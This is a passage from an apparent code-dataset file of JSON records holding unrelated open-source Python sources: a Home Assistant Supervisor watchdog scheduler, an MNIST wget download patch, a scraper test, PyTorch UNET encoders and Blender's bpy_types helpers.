scheduler task for monitoring running state of API.\n\n Try 2 times to call API before we restart Home-Assistant. Maybe we had\n a delay in our system.\n \"\"\"\n if not self.sys_homeassistant.watchdog:\n # Watchdog is not enabled for Home Assistant\n return\n if self.sys_homeassistant.error_state:\n # Home Assistant is in an error state, this is handled by the rollback feature\n return\n if not await self.sys_homeassistant.core.is_running():\n # The home assistant container is not running\n return\n if self.sys_homeassistant.core.in_progress:\n # Home Assistant has a task in progress\n return\n if await self.sys_homeassistant.api.check_api_state():\n # Home Assistant is running properly\n return\n\n # Init cache data\n retry_scan = self._cache.get(HASS_WATCHDOG_API, 0)\n\n # Look like we run into a problem\n retry_scan += 1\n if retry_scan == 1:\n self._cache[HASS_WATCHDOG_API] = retry_scan\n _LOGGER.warning(\"Watchdog miss API response from Home Assistant\")\n return\n\n _LOGGER.error(\"Watchdog found a problem with Home Assistant API!\")\n try:\n await self.sys_homeassistant.core.restart()\n except HomeAssistantError as err:\n _LOGGER.error(\"Home Assistant watchdog reanimation failed!\")\n self.sys_capture_exception(err)\n finally:\n self._cache[HASS_WATCHDOG_API] = 0\n\n @Job(conditions=JobCondition.RUNNING)\n async def _update_cli(self):\n \"\"\"Check and run update of cli.\"\"\"\n if not self.sys_plugins.cli.need_update:\n return\n\n _LOGGER.info(\n \"Found new cli version %s, updating\", self.sys_plugins.cli.latest_version\n )\n await self.sys_plugins.cli.update()\n\n @Job(conditions=JobCondition.RUNNING)\n async def _update_dns(self):\n \"\"\"Check and run update of CoreDNS plugin.\"\"\"\n if not self.sys_plugins.dns.need_update:\n return\n\n _LOGGER.info(\n \"Found new CoreDNS plugin version %s, updating\",\n self.sys_plugins.dns.latest_version,\n )\n await self.sys_plugins.dns.update()\n\n @Job(conditions=JobCondition.RUNNING)\n async def _update_audio(self):\n \"\"\"Check and run update of PulseAudio plugin.\"\"\"\n if not self.sys_plugins.audio.need_update:\n return\n\n _LOGGER.info(\n \"Found new PulseAudio plugin version %s, updating\",\n self.sys_plugins.audio.latest_version,\n )\n await self.sys_plugins.audio.update()\n\n @Job(conditions=JobCondition.RUNNING)\n async def _update_observer(self):\n \"\"\"Check and run update of Observer plugin.\"\"\"\n if not self.sys_plugins.observer.need_update:\n return\n\n _LOGGER.info(\n \"Found new Observer plugin version %s, updating\",\n self.sys_plugins.observer.latest_version,\n )\n await self.sys_plugins.observer.update()\n\n @Job(conditions=JobCondition.RUNNING)\n async def _update_multicast(self):\n \"\"\"Check and run update of multicast.\"\"\"\n if not self.sys_plugins.multicast.need_update:\n return\n\n _LOGGER.info(\n \"Found new Multicast version %s, updating\",\n self.sys_plugins.multicast.latest_version,\n )\n await self.sys_plugins.multicast.update()\n\n async def _watchdog_dns_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n # if CoreDNS is active\n if await self.sys_plugins.dns.is_running() or self.sys_plugins.dns.in_progress:\n return\n _LOGGER.warning(\"Watchdog found a problem with CoreDNS plugin!\")\n\n # Detect loop\n await self.sys_plugins.dns.loop_detection()\n\n try:\n await self.sys_plugins.dns.start()\n except CoreDNSError:\n _LOGGER.error(\"CoreDNS watchdog reanimation failed!\")\n\n async def _watchdog_audio_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n # if PulseAudio plugin is active\n if (\n await self.sys_plugins.audio.is_running()\n or self.sys_plugins.audio.in_progress\n ):\n return\n _LOGGER.warning(\"Watchdog found a problem with PulseAudio plugin!\")\n\n try:\n await self.sys_plugins.audio.start()\n except AudioError:\n _LOGGER.error(\"PulseAudio watchdog reanimation failed!\")\n\n async def _watchdog_cli_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n # if cli plugin is active\n if await self.sys_plugins.cli.is_running() or self.sys_plugins.cli.in_progress:\n return\n _LOGGER.warning(\"Watchdog found a problem with cli plugin!\")\n\n try:\n await self.sys_plugins.cli.start()\n except CliError:\n _LOGGER.error(\"CLI watchdog reanimation failed!\")\n\n async def _watchdog_observer_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n # if observer plugin is active\n if (\n await self.sys_plugins.observer.is_running()\n or self.sys_plugins.observer.in_progress\n ):\n return\n _LOGGER.warning(\"Watchdog/Docker found a problem with observer plugin!\")\n\n try:\n await self.sys_plugins.observer.start()\n except ObserverError:\n _LOGGER.error(\"Observer watchdog reanimation failed!\")\n\n async def _watchdog_observer_application(self):\n \"\"\"Check running state of application and rebuild if they is not response.\"\"\"\n # if observer plugin is active\n if (\n self.sys_plugins.observer.in_progress\n or await self.sys_plugins.observer.check_system_runtime()\n ):\n return\n _LOGGER.warning(\"Watchdog/Application found a problem with observer plugin!\")\n\n try:\n await self.sys_plugins.observer.rebuild()\n except ObserverError:\n _LOGGER.error(\"Observer watchdog reanimation failed!\")\n\n async def _watchdog_multicast_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n # if multicast plugin is active\n if (\n await self.sys_plugins.multicast.is_running()\n or self.sys_plugins.multicast.in_progress\n ):\n return\n _LOGGER.warning(\"Watchdog found a problem with Multicast plugin!\")\n\n try:\n await self.sys_plugins.multicast.start()\n except MulticastError:\n _LOGGER.error(\"Multicast watchdog reanimation failed!\")\n\n async def _watchdog_addon_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n for addon in self.sys_addons.installed:\n # if watchdog need looking for\n if not addon.watchdog or await addon.is_running():\n continue\n\n # if Addon have running actions\n if addon.in_progress or addon.state != AddonState.STARTED:\n continue\n\n _LOGGER.warning(\"Watchdog found a problem with %s!\", addon.slug)\n try:\n await addon.start()\n except AddonsError as err:\n _LOGGER.error(\"%s watchdog reanimation failed with %s\", addon.slug, err)\n self.sys_capture_exception(err)\n\n async def _watchdog_addon_application(self):\n \"\"\"Check running state of the application and start if they is hangs.\"\"\"\n for addon in self.sys_addons.installed:\n # if watchdog need looking for\n if not addon.watchdog or addon.state != AddonState.STARTED:\n continue\n\n # Init cache data\n retry_scan = self._cache.get(addon.slug, 0)\n\n # if Addon have running actions / Application work\n if addon.in_progress or await addon.watchdog_application():\n continue\n\n # Look like we run into a problem\n retry_scan += 1\n if retry_scan == 1:\n self._cache[addon.slug] = retry_scan\n _LOGGER.warning(\n \"Watchdog missing application response from %s\", addon.slug\n )\n return\n\n _LOGGER.warning(\"Watchdog found a problem with %s application!\", addon.slug)\n try:\n await addon.restart()\n except AddonsError as err:\n _LOGGER.error(\"%s watchdog reanimation failed with %s\", addon.slug, err)\n self.sys_capture_exception(err)\n finally:\n self._cache[addon.slug] = 0\n\n async def _refresh_addon(self) -> None:\n \"\"\"Refresh addon state.\"\"\"\n for addon in self.sys_addons.installed:\n # if watchdog need looking for\n if addon.watchdog or addon.state != AddonState.STARTED:\n continue\n\n # if Addon have running actions\n if addon.in_progress or await addon.is_running():\n continue\n\n # Adjust state\n addon.state = AddonState.STOPPED\n\n async def _check_connectivity(self) -> None:\n \"\"\"Check system connectivity.\"\"\"\n value = self._cache.get(\"connectivity\", 0)\n\n # Need only full check if not connected or each 10min\n if value >= 600:\n pass\n elif (\n self.sys_supervisor.connectivity\n and self.sys_host.network.connectivity is None\n ) or (\n self.sys_supervisor.connectivity\n and self.sys_host.network.connectivity is not None\n and self.sys_host.network.connectivity\n ):\n self._cache[\"connectivity\"] = value + RUN_CHECK_CONNECTIVITY\n return\n\n # Check connectivity\n try:\n await self.sys_supervisor.check_connectivity()\n if HostFeature.NETWORK in self.sys_host.features:\n await self.sys_host.network.check_connectivity()\n finally:\n self._cache[\"connectivity\"] = 0\n"} {"ext": "py", "sha": "1a2eae319cfbe17043e034104537c118c88238da", "content": "\"\"\"Patch to fix MNIST download issue as described here:\n- https://github.com/pytorch/ignite/issues/1737\n- https://github.com/pytorch/vision/issues/3500\n\"\"\"\n\nimport os\nimport subprocess as sp\n\nimport torch\nfrom torchvision.datasets.mnist import MNIST, read_image_file, read_label_file\nfrom torchvision.datasets.utils import extract_archive\n\n\ndef patched_download(self):\n \"\"\"wget patched download method.\n \"\"\"\n if self._check_exists():\n return\n\n os.makedirs(self.raw_folder, exist_ok=True)\n os.makedirs(self.processed_folder, exist_ok=True)\n\n # download files\n for url, md5 in self.resources:\n filename = url.rpartition(\"/\")[2]\n download_root = os.path.expanduser(self.raw_folder)\n extract_root = None\n remove_finished = False\n\n if extract_root is None:\n extract_root = download_root\n if not filename:\n filename = os.path.basename(url)\n\n # Use wget to download archives\n sp.run([\"wget\", url, \"-P\", download_root])\n\n archive = os.path.join(download_root, filename)\n print(\"Extracting {} to {}\".format(archive, extract_root))\n extract_archive(archive, extract_root, remove_finished)\n\n # process and save as torch files\n print(\"Processing...\")\n\n training_set = (\n read_image_file(os.path.join(self.raw_folder, \"train-images-idx3-ubyte\")),\n read_label_file(os.path.join(self.raw_folder, \"train-labels-idx1-ubyte\")),\n )\n test_set = (\n read_image_file(os.path.join(self.raw_folder, \"t10k-images-idx3-ubyte\")),\n read_label_file(os.path.join(self.raw_folder, \"t10k-labels-idx1-ubyte\")),\n )\n with open(os.path.join(self.processed_folder, self.training_file), \"wb\") as f:\n torch.save(training_set, f)\n with open(os.path.join(self.processed_folder, self.test_file), \"wb\") as f:\n torch.save(test_set, f)\n\n print(\"Done!\")\n\n\ndef main():\n # Patch download method\n MNIST.download = patched_download\n # Download MNIST\n MNIST(\".\", download=True)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2eae3d0fd3157590329c9965e9d4739f1f61d9", "content": "from datetime import datetime\nfrom os.path import dirname, join\n\nimport pytest # noqa\nfrom city_scrapers_core.constants import COMMITTEE, PASSED\nfrom city_scrapers_core.utils import file_response\nfrom freezegun import freeze_time\n\nfrom city_scrapers.spiders.cuya_emergency_services_advisory import (\n CuyaEmergencyServicesAdvisorySpider,\n)\n\ntest_response = file_response(\n join(dirname(__file__), \"files\", \"cuya_emergency_services_advisory.html\"),\n url=\"http://bc.cuyahogacounty.us/en-US/CC-EmergencySrvcsAdvsryBrd.aspx\",\n)\ntest_detail_response = file_response(\n join(dirname(__file__), \"files\", \"cuya_emergency_services_advisory_detail.html\"),\n url=\"http://bc.cuyahogacounty.us/en-US/091119-CCESAB-Comms-meeting.aspx\",\n)\nspider = CuyaEmergencyServicesAdvisorySpider()\n\nfreezer = freeze_time(\"2019-09-25\")\nfreezer.start()\n\nparsed_items = [item for item in spider.parse(test_response)]\nparsed_item = [item for item in spider._parse_detail(test_detail_response)][0]\n\nfreezer.stop()\n\n\ndef test_count():\n assert len(parsed_items) == 30\n\n\ndef test_title():\n assert parsed_item[\"title\"] == \"CCESAB Communications Committee\"\n\n\ndef test_description():\n assert parsed_item[\"description\"] == \"\"\n\n\ndef test_start():\n assert parsed_item[\"start\"] == datetime(2019, 9, 11, 10, 15)\n\n\ndef test_end():\n assert parsed_item[\"end\"] == datetime(2019, 9, 11, 11, 30)\n\n\ndef test_time_notes():\n assert parsed_item[\"time_notes\"] == \"\"\n\n\ndef test_id():\n assert (\n parsed_item[\"id\"]\n == \"cuya_emergency_services_advisory/201909111015/x/ccesab_communications_committee\" # noqa\n )\n\n\ndef test_status():\n assert parsed_item[\"status\"] == PASSED\n\n\ndef test_location():\n assert parsed_item[\"location\"] == {\n \"name\": \"The Cassidy Theatre\",\n \"address\": \"6200 Pearl Road Parma Heights, OH 44130\",\n }\n\n\ndef test_source():\n assert parsed_item[\"source\"] == test_detail_response.url\n\n\ndef test_links():\n assert parsed_item[\"links\"] == [\n {\n \"href\": \"http://bc.cuyahogacounty.us/ViewFile.aspx?file=7DSCAKoM0rqkeTzD%2f6%2f4cw%3d%3d\", # noqa\n \"title\": \"Agenda\",\n }\n ]\n\n\ndef test_classification():\n assert parsed_item[\"classification\"] == COMMITTEE\n\n\ndef test_all_day():\n assert parsed_item[\"all_day\"] is False\n"} {"ext": "py", "sha": "1a2eaf7dce5f6991f2e16b384403c2ea3c1ffc91", "content": "# -*- coding: utf-8 -*-\n# :Project: metapensiero.pj -- compatibility\n# :Created: lun 30 mar 2020, 01:48:33\n# :Author: Alberto Berti \n# :License: GNU General Public License version 3 or later\n# :Copyright: © 2020 Alberto Berti\n#\n\nimport ast\nimport sys\n\nis_py36 = sys.version_info >= (3, 6)\n\nif is_py36:\n assign_types = (ast.Assign, ast.AnnAssign)\nelse:\n assign_types = (ast.Assign,)\n"} {"ext": "py", "sha": "1a2eaf9174fbdebd534e3827025ee1181b781017", "content": "import math\n\nfrom os.path import join as pjoin\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass DoubleConv(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(DoubleConv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n def forward(self, x): \n return self.conv(x)\n\nclass SingleConv_no_pool(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(SingleConv_no_pool, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n )\n def forward(self, x):\n if x.size()[1]== 1: \n x = x.repeat(1,3,1,1) \n return self.conv(x)\n\nclass SingleConv_with_pool(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(SingleConv_with_pool, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n def forward(self, x): \n return self.conv(x)\n\n\nclass UNET_encoder(nn.Module):\n\n def __init__(self):\n super().__init__()\n width = 32\n self.width = width\n\n self.root = nn.Sequential(OrderedDict([\n ('unit1', SingleConv_no_pool(3, width))\n ]))\n\n self.body = nn.Sequential(OrderedDict([\n ('block1', nn.Sequential(OrderedDict(\n [('unit2', SingleConv_with_pool(width, width*2))] \n ))),\n ('block2', nn.Sequential(OrderedDict(\n [('unit3', DoubleConv(width*2, width*4))] \n ))),\n ('block3', nn.Sequential(OrderedDict(\n [('unit4', DoubleConv(width*4, width*8))] \n ))),\n ('block4', nn.Sequential(OrderedDict(\n [('unit5', DoubleConv(width*8, width*16))] \n ))),\n ]))\n\n def forward(self, x):\n features = []\n x = self.root(x)\n b, c, in_size, _ = x.size()\n features.append(x)\n for i in range(len(self.body)-1):\n x = self.body[i](x)\n features.append(x)\n x = self.body[-1](x)\n return x, features[::-1]\n\n\nclass UNET_encoder_FETS(nn.Module):\n\n def __init__(self):\n super().__init__()\n width = 32\n self.width = width\n\n self.root = nn.Sequential(OrderedDict([\n ('unit1', SingleConv_no_pool(4, width))\n ]))\n\n self.body = nn.Sequential(OrderedDict([\n ('block1', nn.Sequential(OrderedDict(\n [('unit2', SingleConv_with_pool(width, width*2))] \n ))),\n ('block2', nn.Sequential(OrderedDict(\n [('unit3', DoubleConv(width*2, width*4))] \n ))),\n ('block3', nn.Sequential(OrderedDict(\n [('unit4', DoubleConv(width*4, width*8))] \n ))),\n ('block4', nn.Sequential(OrderedDict(\n [('unit5', DoubleConv(width*8, width*16))] \n ))),\n ]))\n\n def forward(self, x):\n features = []\n x = self.root(x)\n b, c, in_size, _ = x.size()\n features.append(x)\n for i in range(len(self.body)-1):\n x = self.body[i](x)\n features.append(x)\n x = self.body[-1](x)\n return x, features[::-1]"} {"ext": "py", "sha": "1a2eb12cd9ff66b3d062b24e3cc0580f5782c12d", "content": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nfrom _bpy import types as bpy_types\nimport _bpy\n\nStructRNA = bpy_types.bpy_struct\nStructMetaPropGroup = bpy_types.bpy_struct_meta_idprop\n# StructRNA = bpy_types.Struct\n\nbpy_types.BlendDataLibraries.load = _bpy._library_load\nbpy_types.BlendDataLibraries.write = _bpy._library_write\nbpy_types.BlendData.user_map = _bpy._rna_id_collection_user_map\nbpy_types.BlendData.batch_remove = _bpy._rna_id_collection_batch_remove\n\n\nclass Context(StructRNA):\n __slots__ = ()\n\n def copy(self):\n from types import BuiltinMethodType\n new_context = {}\n generic_attrs = (\n *StructRNA.__dict__.keys(),\n \"bl_rna\", \"rna_type\", \"copy\",\n )\n for attr in dir(self):\n if not (attr.startswith(\"_\") or attr in generic_attrs):\n value = getattr(self, attr)\n if type(value) != BuiltinMethodType:\n new_context[attr] = value\n\n return new_context\n\n\nclass Library(bpy_types.ID):\n __slots__ = ()\n\n @property\n def users_id(self):\n \"\"\"ID data blocks which use this library\"\"\"\n import bpy\n\n # See: readblenentry.c, IDTYPE_FLAGS_ISLINKABLE,\n # we could make this an attribute in rna.\n attr_links = (\n \"actions\", \"armatures\", \"brushes\", \"cameras\",\n \"curves\", \"grease_pencils\", \"collections\", \"images\",\n \"lights\", \"lattices\", \"materials\", \"metaballs\",\n \"meshes\", \"node_groups\", \"objects\", \"scenes\",\n \"sounds\", \"speakers\", \"textures\", \"texts\",\n \"fonts\", \"worlds\",\n )\n\n return tuple(id_block\n for attr in attr_links\n for id_block in getattr(bpy.data, attr)\n if id_block.library == self)\n\n\nclass Texture(bpy_types.ID):\n __slots__ = ()\n\n @property\n def users_material(self):\n \"\"\"Materials that use this texture\"\"\"\n import bpy\n return tuple(mat for mat in bpy.data.materials\n if self in [slot.texture\n for slot in mat.texture_slots\n if slot]\n )\n\n @property\n def users_object_modifier(self):\n \"\"\"Object modifiers that use this texture\"\"\"\n import bpy\n return tuple(\n obj for obj in bpy.data.objects if\n self in [\n mod.texture\n for mod in obj.modifiers\n if mod.type == 'DISPLACE']\n )\n\n\nclass Collection(bpy_types.ID):\n __slots__ = ()\n\n @property\n def users_dupli_group(self):\n \"\"\"The collection instance objects this collection is used in\"\"\"\n import bpy\n return tuple(obj for obj in bpy.data.objects\n if self == obj.instance_collection)\n\n\nclass Object(bpy_types.ID):\n __slots__ = ()\n\n @property\n def children(self):\n \"\"\"All the children of this object. Warning: takes O(len(bpy.data.objects)) time.\"\"\"\n import bpy\n return tuple(child for child in bpy.data.objects\n if child.parent == self)\n\n @property\n def users_collection(self):\n \"\"\"The collections this object is in. Warning: takes O(len(bpy.data.collections) + len(bpy.data.scenes)) time.\"\"\"\n import bpy\n return (\n tuple(\n collection for collection in bpy.data.collections\n if self in collection.objects[:]\n ) + tuple(\n scene.collection for scene in bpy.data.scenes\n if self in scene.collection.objects[:]\n )\n )\n\n @property\n def users_scene(self):\n \"\"\"The scenes this object is in. Warning: takes O(len(bpy.data.scenes) * len(bpy.data.objects)) time.\"\"\"\n import bpy\n return tuple(scene for scene in bpy.data.scenes\n if self in scene.objects[:])\n\n\nclass WindowManager(bpy_types.ID):\n __slots__ = ()\n\n def popup_menu(self, draw_func, title=\"\", icon='NONE'):\n import bpy\n popup = self.popmenu_begin__internal(title, icon=icon)\n\n try:\n draw_func(popup, bpy.context)\n finally:\n self.popmenu_end__internal(popup)\n\n def popover(\n self, draw_func, *,\n ui_units_x=0,\n keymap=None,\n from_active_button=False,\n ):\n import bpy\n popup = self.popover_begin__internal(\n ui_units_x=ui_units_x,\n from_active_button=from_active_button,\n )\n\n try:\n draw_func(popup, bpy.context)\n finally:\n self.popover_end__internal(popup, keymap=keymap)\n\n def popup_menu_pie(self, event, draw_func, title=\"\", icon='NONE'):\n import bpy\n pie = self.piemenu_begin__internal(title, icon=icon, event=event)\n\n if pie:\n try:\n draw_func(pie, bpy.context)\n finally:\n self.piemenu_end__internal(pie)\n\n\nclass WorkSpace(bpy_types.ID):\n __slots__ = ()\n\n def status_text_set(self, text):\n \"\"\"\n Set the status text or None to clear,\n When text is a function, this will be called with the (header, context) arguments.\n \"\"\"\n from bl_ui.space_statusbar import STATUSBAR_HT_header\n draw_fn = getattr(STATUSBAR_HT_header, \"_draw_orig\", None)\n if draw_fn is None:\n draw_fn = STATUSBAR_HT_header._draw_orig = STATUSBAR_HT_header.draw\n\n if not (text is None or isinstance(text, str)):\n draw_fn = text\n text = None\n\n self.status_text_set_internal(text)\n STATUSBAR_HT_header.draw = draw_fn\n\n\nclass _GenericBone:\n \"\"\"\n functions for bones, common between Armature/Pose/Edit bones.\n internal subclassing use only.\n \"\"\"\n __slots__ = ()\n\n def translate(self, vec):\n \"\"\"Utility function to add *vec* to the head and tail of this bone\"\"\"\n self.head += vec\n self.tail += vec\n\n def parent_index(self, parent_test):\n \"\"\"\n The same as 'bone in other_bone.parent_recursive'\n but saved generating a list.\n \"\"\"\n # use the name so different types can be tested.\n name = parent_test.name\n\n parent = self.parent\n i = 1\n while parent:\n if parent.name == name:\n return i\n parent = parent.parent\n i += 1\n\n return 0\n\n @property\n def x_axis(self):\n \"\"\" Vector pointing down the x-axis of the bone.\n \"\"\"\n from mathutils import Vector\n return self.matrix.to_3x3() @ Vector((1.0, 0.0, 0.0))\n\n @property\n def y_axis(self):\n \"\"\" Vector pointing down the y-axis of the bone.\n \"\"\"\n from mathutils import Vector\n return self.matrix.to_3x3() @ Vector((0.0, 1.0, 0.0))\n\n @property\n def z_axis(self):\n \"\"\" Vector pointing down the z-axis of the bone.\n \"\"\"\n from mathutils import Vector\n return self.matrix.to_3x3() @ Vector((0.0, 0.0, 1.0))\n\n @property\n def basename(self):\n \"\"\"The name of this bone before any '.' character\"\"\"\n # return self.name.rsplit(\".\", 1)[0]\n return self.name.split(\".\")[0]\n\n @property\n def parent_recursive(self):\n \"\"\"A list of parents, starting with the immediate parent\"\"\"\n parent_list = []\n parent = self.parent\n\n while parent:\n if parent:\n parent_list.append(parent)\n\n parent = parent.parent\n\n return parent_list\n\n @property\n def center(self):\n \"\"\"The midpoint between the head and the tail.\"\"\"\n return (self.head + self.tail) * 0.5\n\n @property\n def vector(self):\n \"\"\"\n The direction this bone is pointing.\n Utility function for (tail - head)\n \"\"\"\n return (self.tail - self.head)\n\n @property\n def children(self):\n \"\"\"A list of all the bones children. Warning: takes O(len(bones)) time.\"\"\"\n return [child for child in self._other_bones if child.parent == self]\n\n @property\n def children_recursive(self):\n \"\"\"A list of all children from this bone. Warning: takes O(len(bones)**2) time.\"\"\"\n bones_children = []\n for bone in self._other_bones:\n index = bone.parent_index(self)\n if index:\n bones_children.append((index, bone))\n\n # sort by distance to parent\n bones_children.sort(key=lambda bone_pair: bone_pair[0])\n return [bone for index, bone in bones_children]\n\n @property\n def children_recursive_basename(self):\n \"\"\"\n Returns a chain of children with the same base name as this bone.\n Only direct chains are supported, forks caused by multiple children\n with matching base names will terminate the function\n and not be returned. Warning: takes O(len(bones)**2) time.\n \"\"\"\n basename = self.basename\n chain = []\n\n child = self\n while True:\n children = child.children\n children_basename = []\n\n for child in children:\n if basename == child.basename:\n children_basename.append(child)\n\n if len(children_basename) == 1:\n child = children_basename[0]\n chain.append(child)\n else:\n if children_basename:\n print(\"multiple basenames found, \"\n \"this is probably not what you want!\",\n self.name, children_basename)\n\n break\n\n return chain\n\n @property\n def _other_bones(self):\n id_data = self.id_data\n id_data_type = type(id_data)\n\n if id_data_type == bpy_types.Object:\n bones = id_data.pose.bones\n elif id_data_type == bpy_types.Armature:\n bones = id_data.edit_bones\n if not bones: # not in edit mode\n bones = id_data.bones\n\n return bones\n\n\nclass PoseBone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):\n __slots__ = ()\n\n @property\n def children(self):\n obj = self.id_data\n pbones = obj.pose.bones\n self_bone = self.bone\n\n return tuple(pbones[bone.name] for bone in obj.data.bones\n if bone.parent == self_bone)\n\n\nclass Bone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):\n __slots__ = ()\n\n\nclass EditBone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):\n __slots__ = ()\n\n def align_orientation(self, other):\n \"\"\"\n Align this bone to another by moving its tail and settings its roll\n the length of the other bone is not used.\n \"\"\"\n vec = other.vector.normalized() * self.length\n self.tail = self.head + vec\n self.roll = other.roll\n\n def transform(self, matrix, scale=True, roll=True):\n \"\"\"\n Transform the the bones head, tail, roll and envelope\n (when the matrix has a scale component).\n\n :arg matrix: 3x3 or 4x4 transformation matrix.\n :type matrix: :class:`mathutils.Matrix`\n :arg scale: Scale the bone envelope by the matrix.\n :type scale: bool\n :arg roll:\n\n Correct the roll to point in the same relative\n direction to the head and tail.\n\n :type roll: bool\n \"\"\"\n from mathutils import Vector\n z_vec = self.matrix.to_3x3() @ Vector((0.0, 0.0, 1.0))\n self.tail = matrix @ self.tail\n self.head = matrix @ self.head\n\n if scale:\n scalar = matrix.median_scale\n self.head_radius *= scalar\n self.tail_radius *= scalar\n\n if roll:\n self.align_roll(matrix @ z_vec)\n\n\ndef ord_ind(i1, i2):\n if i1 < i2:\n return i1, i2\n return i2, i1\n\n\nclass Mesh(bpy_types.ID):\n __slots__ = ()\n\n def from_pydata(self, vertices, edges, faces):\n \"\"\"\n Make a mesh from a list of vertices/edges/faces\n Until we have a nicer way to make geometry, use this.\n\n :arg vertices:\n\n float triplets each representing (X, Y, Z)\n eg: [(0.0, 1.0, 0.5), ...].\n\n :type vertices: iterable object\n :arg edges:\n\n int pairs, each pair contains two indices to the\n *vertices* argument. eg: [(1, 2), ...]\n\n :type edges: iterable object\n :arg faces:\n\n iterator of faces, each faces contains three or more indices to\n the *vertices* argument. eg: [(5, 6, 8, 9), (1, 2, 3), ...]\n\n :type faces: iterable object\n\n .. warning::\n\n Invalid mesh data\n *(out of range indices, edges with matching indices,\n 2 sided faces... etc)* are **not** prevented.\n If the data used for mesh creation isn't known to be valid,\n run :class:`Mesh.validate` after this function.\n \"\"\"\n from itertools import chain, islice, accumulate\n\n face_lengths = tuple(map(len, faces))\n\n self.vertices.add(len(vertices))\n self.edges.add(len(edges))\n self.loops.add(sum(face_lengths))\n self.polygons.add(len(faces))\n\n self.vertices.foreach_set(\"co\", tuple(chain.from_iterable(vertices)))\n self.edges.foreach_set(\"vertices\", tuple(chain.from_iterable(edges)))\n\n vertex_indices = tuple(chain.from_iterable(faces))\n loop_starts = tuple(islice(chain([0], accumulate(face_lengths)), len(faces)))\n\n self.polygons.foreach_set(\"loop_total\", face_lengths)\n self.polygons.foreach_set(\"loop_start\", loop_starts)\n self.polygons.foreach_set(\"vertices\", vertex_indices)\n\n # if no edges - calculate them\n if faces and (not edges):\n self.update(calc_edges=True)\n elif edges:\n self.update(calc_edges_loose=True)\n\n @property\n def edge_keys(self):\n return [ed.key for ed in self.edges]\n\n\nclass MeshEdge(StructRNA):\n __slots__ = ()\n\n @property\n def key(self):\n return ord_ind(*tuple(self.vertices))\n\n\nclass MeshLoopTriangle(StructRNA):\n __slots__ = ()\n\n @property\n def center(self):\n \"\"\"The midpoint of the face.\"\"\"\n face_verts = self.vertices[:]\n mesh_verts = self.id_data.vertices\n return (\n mesh_verts[face_verts[0]].co +\n mesh_verts[face_verts[1]].co +\n mesh_verts[face_verts[2]].co\n ) / 3.0\n\n @property\n def edge_keys(self):\n verts = self.vertices[:]\n return (\n ord_ind(verts[0], verts[1]),\n ord_ind(verts[1], verts[2]),\n ord_ind(verts[2], verts[0]),\n )\n\n\nclass MeshPolygon(StructRNA):\n __slots__ = ()\n\n @property\n def edge_keys(self):\n verts = self.vertices[:]\n vlen = len(self.vertices)\n return [ord_ind(verts[i], verts[(i + 1) % vlen]) for i in range(vlen)]\n\n @property\n def loop_indices(self):\n start = self.loop_start\n end = start + self.loop_total\n return range(start, end)\n\n\nclass Text(bpy_types.ID):\n __slots__ = ()\n\n def as_string(self):\n \"\"\"Return the text as a string.\"\"\"\n return \"\\n\".join(line.body for line in self.lines)\n\n def from_string(self, string):\n \"\"\"Replace text with this string.\"\"\"\n self.clear()\n self.write(string)\n\n def as_module(self):\n from os.path import splitext\n from types import ModuleType\n mod = ModuleType(splitext(self.name)[0])\n # TODO: We could use Text.compiled (C struct member)\n # if this is called often it will be much faster.\n exec(self.as_string(), mod.__dict__)\n return mod\n\n\nclass Sound(bpy_types.ID):\n __slots__ = ()\n\n @property\n def factory(self):\n \"\"\"The aud.Factory object of the sound.\"\"\"\n import aud\n return aud._sound_from_pointer(self.as_pointer())\n\n\nclass RNAMeta(type):\n # TODO(campbell): move to C-API\n @property\n def is_registered(cls):\n return \"bl_rna\" in cls.__dict__\n\n\nclass RNAMetaPropGroup(StructMetaPropGroup, RNAMeta):\n pass\n\n\n# Same as 'Operator'\n# only without 'as_keywords'\nclass Gizmo(StructRNA):\n __slots__ = ()\n\n def __getattribute__(self, attr):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is not None) and (attr in bl_rna.properties):\n return getattr(properties, attr)\n return super().__getattribute__(attr)\n\n def __setattr__(self, attr, value):\n properties = StructRNA.path_resolve(self, \"properties\")\n bl_rna = getattr(properties, \"bl_rna\", None)\n if (bl_rna is 